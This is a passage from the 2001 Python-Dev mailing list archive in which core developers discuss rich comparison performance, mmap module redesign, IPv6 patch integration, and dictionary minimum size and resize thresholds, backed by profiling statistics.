>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett at stsci.edu  Thu May 17 16:56:49 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one at home.com  Thu May 17 18:02:38 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forecefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
   non-dict string case anyway (where it succeeded only 1 in 20
   times).

#2 is a special case that can be special-cased to death, but #1 likely
applies to code using cmp() for comparisons of objects of any type, and
that's the primary reason I've resisted adding richcmps to the
heavily-compared types (variously string, int, float, long, and type
objects).  Also the case that adding "a fast path" shouldn't have to endure
wading thru multiple gimmicks (kinda defeats the idea of "fast" <wink>), so
the instant *one* heavily-compared basic type grows a richcmp (there are 0
such today), all should.

So that's what I'll aim at.


From guido at digicool.com  Thu May 17 20:18:27 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 14:18:27 -0400
Subject: [Python-Dev] IPv6
Message-ID: <200105171818.f4HIIRv12891@odiug.digicool.com>

What's out IPv6 story?  I recall that someone once sent me patches,
but they didn't work for me.  Is it time to try again?  In certain
circles IPv6 support in Python would be enough to switch programming
languages... :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 21:45:29 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 21:45:29 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>
Message-ID: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de>

> 1. Code using cmp(string1, string2) will clearly run significantly
>    slower, calling string comparison 1 (when == obtains), 2 (when <
>    obtains), or 3 (when > obtains) times instead of always once only.

I'd like to question the rationale behind this procedure. If a type
has both tp_compare and tp_richcompare, and the application is
performing cmp(o1, o2): Why is it then a good thing to emulate 3way
compare using rich compare?

I just changed the order in do_cmp, to the IMO more correct 

	if (v->ob_type == w->ob_type
	    && (f = v->ob_type->tp_compare) != NULL)
		return (*f)(v, w);
	c = try_rich_to_3way_compare(v, w);
	if (c < 2)
		return c;
	c = try_3way_compare(v, w);
	if (c < 2)
		return c;
	return default_3way_compare(v, w);

With that, I got only a single failure in the test suite:
test_userlist fails with

exceptions.RuntimeError: UserList.__cmp__() is obsolete

Tim thinks this is a bug in UserList, since __cmp__ is not obsolete; I
agree.

According to the CVS log, this implementation of do_cmp was installed
in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific
rationale for doing do_cmp in that order?

Regards,
Martin


From tim at digicool.com  Fri May 18 00:55:19 2001
From: tim at digicool.com (Tim Peters)
Date: Thu, 17 May 2001 18:55:19 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
Message-ID: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>

The worst percentage hit in both MAL's and Jeremy's pybench run was (here
showing Jeremy's numbers, cuz I doubt anyone could reproduce MAL's <wink>):

        DictCreation:      87.80 ms    2.93 us  +115.72%

Assorted things do not account for it:  the new overhead of linking and
unlinking dicts into the gc list (at creation and destruction times) seems
to account for no more than 2%; and the overhead due to using the slower
lookdict (as opposed to lookdict_string) even less.

Jeremy cheated by running a profiler:  the true cause is that dictresize
gets called about twice as often.

Before 2.1:  *before* inserting an item, we checked to see whether the dict
was at the resize point.  If so, we resized it.  Note that this meant
PyDict_SetItem could grow a dict even if no new entry was made (and that
this was the cause of several excruciating bugs in the 2.1 release cycle,
since it meant a dict could get reshuffled merely when replacing the values
associated with existing keys).

2.1:  *after* inserting an item, and if the key was new (i.e., the dict grew
a new entry, as opposed to just replacing the value associated with an
existing key), and the dict is at the resize point, we resize it.

Now the DictCreation test overwhelmingly creates dicts of size exactly 3.
The dict resizes from empty to capacity 4 on the way to gaining 2 entries.
When adding the third:

Before 2.1:  2 < (2/3)*4 == 2 2/3, so the dict is not resized and ends up
remaining a capacity-4 dict with 3 slots full.  This actually violates a
documented dict invariant (i.e., that dicts are never more than 2/3rd full).

2.1:  The third item added is a new item, and 3 > (2/3)*4 == 2 2/3, so we
*do* resize it, and the dict ends up with 3 of 8 slots full.

I've got no interest in trying to restore the old behavior.  A compromise
may be to boost the minimum size of a non-empty dict from 4 to 8.  As is,
the only non-empty dicts that can get away with using the current minimum
size of 4 have no more than 2 elements.  The question is whether such tiny
non-empty dicts are common enough to make everyone else pay for "an extra"
resize.

go-ahead-just-*try*-to-prove-your-answer<wink>-ly y'rs  - tim


From skip at pobox.com  Fri May 18 01:21:50 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 18:21:50 -0500
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
References: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <15108.23822.538016.564151@beluga.mojam.com>

    Guido> In certain circles IPv6 support in Python would be enough to
    Guido> switch programming languages... :-)

Sounds like someone has caught the scent of world domination... ;-)

S


From jeremy at digicool.com  Thu May 17 20:39:07 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 14:39:07 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.6859.810306.811326@slothrop.digicool.com>

Another option is to change the benchmark to put one more item in the
dict.  Then the same number of resizes would occur with both versions
of Python.

Jeremy


From tim.one at home.com  Fri May 18 02:08:13 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:08:13 -0400
Subject: [Python-Dev] mmap module
In-Reply-To: <3B03E6B1.A19F6594@STScI.Edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>

[Paul Barrett]
> In the CVS log of the mmapmodule.c, Tim Peters says:
>
> "The code really needs to be rethought from scratch (not by me, though
> ...)."

That was in specific reference to the code I changed, in mmap_find_method.
The difficulty is that mmap is great for "large files", but the code before
my change used a C int for the starting offset and also for the return value;
I boosted those to a C long, which covers 63 bits on 64-bit Linux boxes, but
doesn't help 64-bit Windows at all (where a C long remains 4 bytes).  The
mmap_object struct uses size_t to declare the relevant members, which is
possibly better still than C long, but may still leave platform capabilities
out of reach for large files (e.g., "even Win95" *allows* specifying 64-bit
offsets when creating a mapped file view).  C is a friggin' mess here, and
Python's PyArg_ParseTuple() and Py_BuildValue() don't cater to the full range
of C integral types anyway.  In other words, if this code is ever to reach
its full potential, it "really needs to be rethought from scratch".

> Well, I might be the person to do the rethinking, but I'd first like
> to know what Tim has in mind.

Nothing that you did <wink>.

> I've been playing around with this module lately and tend to agree
> that some enhancements could be made, particularly to prevent "bus
> errors" and "segmentation faults".

When you get one of those, it's a bug in Python!

> The ability to have offsets into a file that are not multiples of the
> system pagesize would also be nice.

It's OS-specific.  Python should grow warts to protect against it on the OSes
that care.

> I'd be willing to submit a PEP on a new mmapmodule, once I know what
> others would like.

Hard to say.  This has the potential to become Python's next thread
subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
you do write a PEP, I vote to say that we'll cover Windows and Linux (and
maybe Mac OS X?) out of the box, but any other platform is at your own risk
(it doesn't really help if somebody pops up volunteering to support a
minority platform, because they eventually go away, their code stops working,
and it never gets fixed -- so it's use-at-your-own-risk in reality
regardless).


From tim.one at home.com  Fri May 18 02:29:18 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 20:29:18 -0400
Subject: [Python-Dev] IPv6
In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOKKCAA.tim.one@home.com>

[Guido van Rossum]
> What's out IPv6 story?

Ah!  If that's version 6 of the Integer-Point alternative to Floating-Point,
I've got it covered.  Otherwise my guess is we have no story at all.

> I recall that someone once sent me patches, but they didn't work for me.

Try recompiling with -DLONG_BIT=33.

> Is it time to try again?  In certain circles IPv6 support in Python
> would be enough to switch programming languages... :-)

Floating-point is *that* bad?!

ever-helpful-ly y'rs  - tim


From jeremy at digicool.com  Fri May 18 00:16:15 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Thu, 17 May 2001 18:16:15 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com>
Message-ID: <15108.19887.534514.864376@slothrop.digicool.com>

>>>>> "TP" == Tim Peters <tim at digicool.com> writes:

  TP> I've got no interest in trying to restore the old behavior.  A
  TP> compromise may be to boost the minimum size of a non-empty dict
  TP> from 4 to 8.  As is, the only non-empty dicts that can get away
  TP> with using the current minimum size of 4 have no more than 2
  TP> elements.  The question is whether such tiny non-empty dicts are
  TP> common enough to make everyone else pay for "an extra" resize.

I also did a profile run on CreateInstances, which has a difference of
+55.54% on my machine.  It's basically the same story.  The instance
dictionary is getting resized more often with Python 2.1+ than it did
with Python 1.5.2.  I wouldn't be surprised if several more tests are
showing a slowdown with the same cause.

So boosting the minimum size sounds like a good thing.

Jeremy


From tim.one at home.com  Fri May 18 05:26:52 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 23:26:52 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <005701c0dd38$2f417560$0900a8c0@spiff>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOOKCAA.tim.one@home.com>

[/F]
> more info here:
>
> http://home.rica.net/alphae/419coal/index.htm
>
>     "A Five Billion US$ (as of 1996, much more now) worldwide
>     Scam which has run since the early 1980's under Successive
>     Governments of Nigeria.
>
>     "The Nigerian Scam is, according to published reports, the
>     Third to Fifth largest industry in Nigeria."

Most interesting to me is that US Post Office is upset about this:

    http://www.usps.gov/websites/depart/inspect/pressrel.htm

They don't seem to care so much that people are getting scammed, but that the
letters mailed from Nigeria to advance the fee-extorting phase of the scam
often use counterfeit postage!  Where else but here

    http://www.usps.gov/websites/depart/inspect/metercap.htm

could you learn that "Postage meters are not used in Nigeria -? therefore,
all postage meter impressions on Nigerian mail are counterfeit!"?

governments-are-mostly-insane-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Fri May 18 06:45:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 18 May 2001 06:45:21 +0200
Subject: [Python-Dev] IPv6
References: <oqbsosgh94.fsf@lin2.sram.qc.ca>
Message-ID: <200105180445.f4I4jL101178@mira.informatik.hu-berlin.de>

> What's out IPv6 story?  I recall that someone once sent me patches,
> but they didn't work for me.  Is it time to try again?  In certain
> circles IPv6 support in Python would be enough to switch programming
> languages... :-)

It's still on SF,

http://sourceforge.net/tracker/index.php?func=detail&aid=401196&group_id=5470&atid=305470

There are two problems with that patch, AFAICT:

1. It is too large for any individual to review in one chunk.
2. It gets quickly outdated.
3. It touches core aspects of the socket handling that are IMO better
   untouched. I don't know whether the generalization proposed there
   is necessary to support IPv6 reasonably - the author certainly feels
   it is.

To integrate the patch, I would propose to split it into smaller
parts, and submit and review them one-by-one. The first patch should
deal only with autoconf stuff, so that the proper #defines are in
config.h (although they would not be used right away). The second
patch should be a tar file of all new files (the patch on SF actually
misses some files). The third patch should include changes to the C
modules, and the last one changes to the standard library modules.

For that procedure to work, we need cooperation from the
submitter. For that, we probably need to indicate that we are really
interested in his work, and will work with him to integrate it into
Python. So far, his impression must be that nobody is interested - the
patch is sitting there since 2000-08-16, making it the oldes open
patch.

Undoubtedly, integrating this piece of work will result in various
problems with Python CVS: it won't build anymore on "funny machines"
(like Windows), and it might even crash on code that used to work just
fine. This prediction is not based on the actual content of the patch,
merely on its size, and the fact that IPv6 support is experimental on
many systems. So we'ld also need a BDFL pronouncement that we really
really want this, and that anybody running into problems should either
help fixing them, or stay away from CVS while it is being integrated.

Regards,
Martin


From tim at digicool.com  Fri May 18 09:17:07 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 03:17:07 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>

[Jeremy]
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
>
> So boosting the minimum size sounds like a good thing.

I don't know.  PyBench is great for showing that *something* changed, but
it's got even less claim to "typical use" than pystone.

I don't know that the test suite is better in that respect, but it's got much
more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
record the ma_fill of each dict on its way to the grave (ma_fill == number of
non-virgin slots).  Across the test suite, here's the ranking, from most to
least popular fill:

  count    fill %total  cumulative %
 ------    ---- ------  ------------
 146321       1  53.30  53.30
  38200       0  13.91  67.21
  32616       2  11.88  79.09
  29648       3  10.80  89.89
   9884       5   3.60  93.49
   5423       4   1.98  95.47
   2428       6   0.88  96.35
   2016       8   0.73  97.08
   1179       7   0.43  97.51
    904       9   0.33  97.84
    709     103   0.26  98.10
    554      10   0.20  98.30
    513      13   0.19  98.49
    459      12   0.17  98.66
    447      11   0.16  98.82
    364      14   0.13  98.95
    233      15   0.08  99.04
    231      16   0.08  99.12
    193      18   0.07  99.19
    180      17   0.07  99.26
    122      19   0.04  99.30
    107      30   0.04  99.34
    105      21   0.04  99.38
     93      22   0.03  99.41
     93      20   0.03  99.45
     86     256   0.03  99.48
     82      23   0.03  99.51
     80      26   0.03  99.54
     74      24   0.03  99.56
     69      27   0.03  99.59
     64      25   0.02  99.61
     60      29   0.02  99.63
     49      28   0.02  99.65
     44      34   0.02  99.67
     33      32   0.01  99.68
     28      31   0.01  99.69
     27      37   0.01  99.70
     27      33   0.01  99.71
     26      35   0.01  99.72
     24      36   0.01  99.73
     23      39   0.01  99.74
     23      38   0.01  99.75
     21     128   0.01  99.75
     19      44   0.01  99.76
     19      40   0.01  99.77
     17      46   0.01  99.77
     16      48   0.01  99.78
     15      47   0.01  99.78
     14      50   0.01  99.79
     14      42   0.01  99.79

There are many more sizes, but I cut off the display here when they got too
rare to round to 1% of 1% of the total count.

Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
away with at most one resize (a dict of size 8 is enough for a fill of 5, but
not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
alive *at the same time*, it would be quite a waste of space to force the
non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
things like building one- or two-element keyword argument dicts, their
lifetimes rarely overlap.

A more aggressive idea is to allow denser dicts, by allowing them to become
no more than 75% full.  That is, change the resize test from

    mp->ma_fill*3 >= mp->ma_size*2

to

    mp->ma_fill*4 > mp->ma_size*3

That would allow the 10.8% of real(er) life dicts with fill 3 to continue
living in dicts with 4 slots, and allow about 90% of all dicts to get away
with no more than one resize.  The downside is that boosting the max load
factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
a small boost in the expected # of compares.  But the "theory" is for random
hash functions with "uniform probing" (tech term that does *not* mean linear
probing), and Python's hash functions often aren't random at all, while AFAIK
no rigorous analysis of its probing strategy exists.

So, plenty of arbitrary data there upon which to flip a coin <wink>.


From mal at lemburg.com  Fri May 18 09:26:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 09:26:36 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <BIEJKCLHCIOIHAGOKOLHOEJBCAAA.tim@digicool.com> <15108.19887.534514.864376@slothrop.digicool.com>
Message-ID: <3B04CEAC.57251CD7@lemburg.com>

Jeremy Hylton wrote:
> 
> >>>>> "TP" == Tim Peters <tim at digicool.com> writes:
> 
>   TP> I've got no interest in trying to restore the old behavior.  A
>   TP> compromise may be to boost the minimum size of a non-empty dict
>   TP> from 4 to 8.  As is, the only non-empty dicts that can get away
>   TP> with using the current minimum size of 4 have no more than 2
>   TP> elements.  The question is whether such tiny non-empty dicts are
>   TP> common enough to make everyone else pay for "an extra" resize.
> 
> I also did a profile run on CreateInstances, which has a difference of
> +55.54% on my machine.  It's basically the same story.  The instance
> dictionary is getting resized more often with Python 2.1+ than it did
> with Python 1.5.2.  I wouldn't be surprised if several more tests are
> showing a slowdown with the same cause.
> 
> So boosting the minimum size sounds like a good thing.

FYI, I have a patch which inlines small dictionaries directly
into the type object (rather than usin malloc to allocate
the slot buffer).

I've experimented with the minimal size a lot and found that
setting it to 8 slots gives the bext performance/memory tradeoff.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim at digicool.com  Fri May 18 10:32:39 2001
From: tim at digicool.com (Tim Peters)
Date: Fri, 18 May 2001 04:32:39 -0400
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>

[MAL]
> FYI, I have a patch which inlines small dictionaries directly
> into the type object

You don't mean that, but how about uploading the patch to SF anyway?  Assign
it to me and I'll dig into it.

> ...
> I've experimented with the minimal size a lot and found that
> setting it to 8 slots gives the bext performance/memory tradeoff.

Having done just a couple rounds of instrumented runs across various apps, I
was moving to that conclusion too.  Also that "small" dicts are so common
that avoiding the "extra" malloc would be a nice win for them, and that large
dicts are rare enough and resizing expensive enough anyway that the new cost
of doing a two-headed allocation strategy would be lost in the noise.  IOW,
I'm inclined to believe that everything you say your patch does is Good For
Python, and Guido is so sympathetic to my lack of sleep lately that I bet
he'll let me slip in one uglification without scowling <wink>.


From mal at lemburg.com  Fri May 18 13:36:28 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:36:28 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
Message-ID: <3B05093C.8248AE96@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

Right, I meant the dict object... (the "not enough coffee" thingie
again ;-)
 
> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

I'll see if I find time today to rework the patch for Python CVS.
The patch is hiding in my old Python 1.5 killer patch ;-) -- which
gives more than a 50% boost on my machine, but that's another
story.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 18 13:38:39 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 18 May 2001 13:38:39 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
References: <LNBBLJKPBEHFEDALKOLCAEPCKCAA.tim@digicool.com>
Message-ID: <3B0509BF.A2F84A30@lemburg.com>

Tim Peters wrote:
> 
> [Jeremy]
> > I also did a profile run on CreateInstances, which has a difference of
> > +55.54% on my machine.  It's basically the same story.  The instance
> > dictionary is getting resized more often with Python 2.1+ than it did
> > with Python 1.5.2.  I wouldn't be surprised if several more tests are
> > showing a slowdown with the same cause.
> >
> > So boosting the minimum size sounds like a good thing.
> 
> I don't know.  PyBench is great for showing that *something* changed, but
> it's got even less claim to "typical use" than pystone.

It doesn't claim "typical use". pybench is aimed at finding out
performance issues about hot-spots -- there's no such thing as
a "typical program", so pybench gives you low level performance
compares for very specific tasks, e.g. dictionary creation or
for-loop performance.

I have found it to be rather successful at that. At least gives
some good hints at where to look...
 
> I don't know that the test suite is better in that respect, but it's got much
> more variety and everyone has it <wink>.  I stuffed code in dict_dealloc() to
> record the ma_fill of each dict on its way to the grave (ma_fill == number of
> non-virgin slots).  Across the test suite, here's the ranking, from most to
> least popular fill:
> 
>   count    fill %total  cumulative %
>  ------    ---- ------  ------------
>  146321       1  53.30  53.30
>   38200       0  13.91  67.21
>   32616       2  11.88  79.09
>   29648       3  10.80  89.89
>    9884       5   3.60  93.49
>    5423       4   1.98  95.47
>    2428       6   0.88  96.35
>    2016       8   0.73  97.08
>    1179       7   0.43  97.51
>     904       9   0.33  97.84
>     709     103   0.26  98.10
>     554      10   0.20  98.30
>     513      13   0.19  98.49
>     459      12   0.17  98.66
>     447      11   0.16  98.82
>     364      14   0.13  98.95
>     233      15   0.08  99.04
>     231      16   0.08  99.12
>     193      18   0.07  99.19
>     180      17   0.07  99.26
>     122      19   0.04  99.30
>     107      30   0.04  99.34
>     105      21   0.04  99.38
>      93      22   0.03  99.41
>      93      20   0.03  99.45
>      86     256   0.03  99.48
>      82      23   0.03  99.51
>      80      26   0.03  99.54
>      74      24   0.03  99.56
>      69      27   0.03  99.59
>      64      25   0.02  99.61
>      60      29   0.02  99.63
>      49      28   0.02  99.65
>      44      34   0.02  99.67
>      33      32   0.01  99.68
>      28      31   0.01  99.69
>      27      37   0.01  99.70
>      27      33   0.01  99.71
>      26      35   0.01  99.72
>      24      36   0.01  99.73
>      23      39   0.01  99.74
>      23      38   0.01  99.75
>      21     128   0.01  99.75
>      19      44   0.01  99.76
>      19      40   0.01  99.77
>      17      46   0.01  99.77
>      16      48   0.01  99.78
>      15      47   0.01  99.78
>      14      50   0.01  99.79
>      14      42   0.01  99.79
> 
> There are many more sizes, but I cut off the display here when they got too
> rare to round to 1% of 1% of the total count.
> 
> Boosting the first non-empty size to 8 would allow 93+% of all dicts to get
> away with at most one resize (a dict of size 8 is enough for a fill of 5, but
> not 6).  OTOH, the current first non-empty size of 4 is enough for 79% of all
> dicts (enough for a fill of 2, but not 3).  If oodles of those tiny dicts are
> alive *at the same time*, it would be quite a waste of space to force the
> non-empty ones to carry 8 slots.  OTOH, if those small dicts are due to
> things like building one- or two-element keyword argument dicts, their
> lifetimes rarely overlap.

I found that instance dictionaries are usual within the 8 slot
range. You normally have a few heavy wheight instances and 
many light wheight ones which only have two or three attributes
in their instance dict.
 
> A more aggressive idea is to allow denser dicts, by allowing them to become
> no more than 75% full.  That is, change the resize test from
> 
>     mp->ma_fill*3 >= mp->ma_size*2
> 
> to
> 
>     mp->ma_fill*4 > mp->ma_size*3
> 
> That would allow the 10.8% of real(er) life dicts with fill 3 to continue
> living in dicts with 4 slots, and allow about 90% of all dicts to get away
> with no more than one resize.  The downside is that boosting the max load
> factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit,
> a small boost in the expected # of compares.  But the "theory" is for random
> hash functions with "uniform probing" (tech term that does *not* mean linear
> probing), and Python's hash functions often aren't random at all, while AFAIK
> no rigorous analysis of its probing strategy exists.
> 
> So, plenty of arbitrary data there upon which to flip a coin <wink>.

Why not make those parameters macros at the top of dictobject.c
which can then be tuned to whatever the programmer needs/wants ?!

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 18 17:05:45 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 18 May 2001 10:05:45 -0500
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400."
             <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> 
Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>

> [MAL]
> > FYI, I have a patch which inlines small dictionaries directly
> > into the type object
> 
> You don't mean that, but how about uploading the patch to SF anyway?  Assign
> it to me and I'll dig into it.

(I guess he means the buffer is alloc'ed contiguously with the dict
object head.  That's often a nice strategy.  Could do that for small
lists too maybe, except those haven't gotten anybody's attention just
yet.)

> > ...
> > I've experimented with the minimal size a lot and found that
> > setting it to 8 slots gives the bext performance/memory tradeoff.
> 
> Having done just a couple rounds of instrumented runs across various apps, I
> was moving to that conclusion too.  Also that "small" dicts are so common
> that avoiding the "extra" malloc would be a nice win for them, and that large
> dicts are rare enough and resizing expensive enough anyway that the new cost
> of doing a two-headed allocation strategy would be lost in the noise.  IOW,
> I'm inclined to believe that everything you say your patch does is Good For
> Python, and Guido is so sympathetic to my lack of sleep lately that I bet
> he'll let me slip in one uglification without scowling <wink>.

Yeah, this one sounds like a nice improvement.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From thomas at xs4all.net  Fri May 18 17:00:21 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 18 May 2001 17:00:21 +0200
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com> <200105181505.KAA16890@cj20424-a.reston1.va.home.com>
Message-ID: <20010518170021.B16811@xs4all.nl>

On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote:

> (I guess he means the buffer is alloc'ed contiguously with the dict
> object head.  That's often a nice strategy.  Could do that for small
> lists too maybe, except those haven't gotten anybody's attention just
> yet.)

Sounds to me like it would benifit tuples even more than lists or dicts. At
least in my code, I see more short tuples than short lists, and they are
usually not altered after creation ;-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From fdrake at acm.org  Fri May 18 17:12:34 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 18 May 2001 11:12:34 -0400 (EDT)
Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares)
In-Reply-To: <20010518170021.B16811@xs4all.nl>
References: <LNBBLJKPBEHFEDALKOLCEEPHKCAA.tim@digicool.com>
	<200105181505.KAA16890@cj20424-a.reston1.va.home.com>
	<20010518170021.B16811@xs4all.nl>
Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com>

Thomas Wouters writes:
 > Sounds to me like it would benifit tuples even more than lists or dicts. At
 > least in my code, I see more short tuples than short lists, and they are
